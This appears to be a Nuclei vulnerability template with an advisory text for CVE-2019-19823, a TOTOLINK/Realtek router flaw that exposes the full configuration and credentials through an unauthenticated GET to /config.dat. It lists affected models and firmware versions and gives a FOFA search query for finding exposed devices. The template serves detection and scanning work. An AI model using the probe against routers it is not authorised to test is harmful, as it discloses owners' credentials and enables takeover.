A certain router administration interface using Realtek APMIB (e.g., on TOTOLINK models) allows unauthenticated remote attackers to disclose the entire router configuration, including sensitive credentials, via accessing the "config.dat" file. Affected devices include TOTOLINK A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, N100RE through 3.4.0, and other Realtek SDK-based devices.
PoC代码[已公开]
id: CVE-2019-19823
info:
name: TOTOLINK/Realtek Routers - Information Disclosure
author: ritikchaddha
severity: high
description: |
A certain router administration interface using Realtek APMIB (e.g., on TOTOLINK models) allows unauthenticated remote attackers to disclose the entire router configuration, including sensitive credentials, via accessing the "config.dat" file. Affected devices include TOTOLINK A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, N100RE through 3.4.0, and other Realtek SDK-based devices.
reference:
- http://packetstormsecurity.com/files/156083/Realtek-SDK-Information-Disclosure-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-19822
classification:
cve-id: CVE-2019-19823
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-306
metadata:
verified: true
max-requests: 1
vendor: totolink
fofa-query: title="totolink"
tags: cve,cve2019,totolink,realtek,exposure,config,boa
http:
- method: GET
path:
- "{{BaseURL}}/config.dat"
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/plain")'
- 'contains(to_lower(server), "boa")'
- 'contains(accept_ranges, "bytes")'
- 'status_code == 200'
condition: and